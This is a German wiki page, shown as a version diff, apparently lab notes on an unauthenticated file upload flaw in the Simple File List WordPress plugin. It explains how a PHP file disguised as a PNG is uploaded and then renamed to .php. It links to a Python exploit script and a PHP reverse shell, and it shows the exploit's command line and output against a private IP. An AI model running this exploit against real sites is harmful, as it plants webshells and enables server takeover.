Unauthenticated Arbitrary File Upload: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 8: Zeile 8:
 
==PHP Reverse Shell==
 
==PHP Reverse Shell==
 
[[PHP-Reverse-Shell-Script|PHP Script]]
 
[[PHP-Reverse-Shell-Script|PHP Script]]
 +
 +
==Usage==
 +
*python3 script.py http://10.85.70.213
 +
[ ] File 3012.png generated with password: 3bde8f1c67657e9b4c7119ee8beae4c4
 +
[ ] File uploaded at http://10.85.70.213/wp-content/uploads/simple-file-list/3012.png
 +
[ ] File moved to http://10.85.70.213/wp-content/uploads/simple-file-list/3012.php
 +
[+] Exploit seem to work.
 +
[*] Confirmning ...

Version vom 11. April 2022, 13:14 Uhr

Arbitrary file upload in Simple File List plugin for WordPress

Schachstelle

Die Schwachstelle besteht aufgrund einer unzureichenden Validierung von Dateien während des Datei-Uploads. Ein entfernter Angreifer kann eine Datei hochladen, die PHP-Code enthält, aber eine png-Bilddateierweiterung hat, dann eine zweite Anfrage senden, um die png-Datei in eine PHP-Datei zu verschieben.

Python3 Script zum Payload Hochladen

Python3 Script

PHP Reverse Shell

PHP Script

Usage

[ ] File 3012.png generated with password: 3bde8f1c67657e9b4c7119ee8beae4c4
[ ] File uploaded at http://10.85.70.213/wp-content/uploads/simple-file-list/3012.png
[ ] File moved to http://10.85.70.213/wp-content/uploads/simple-file-list/3012.php
[+] Exploit seem to work.
[*] Confirmning ...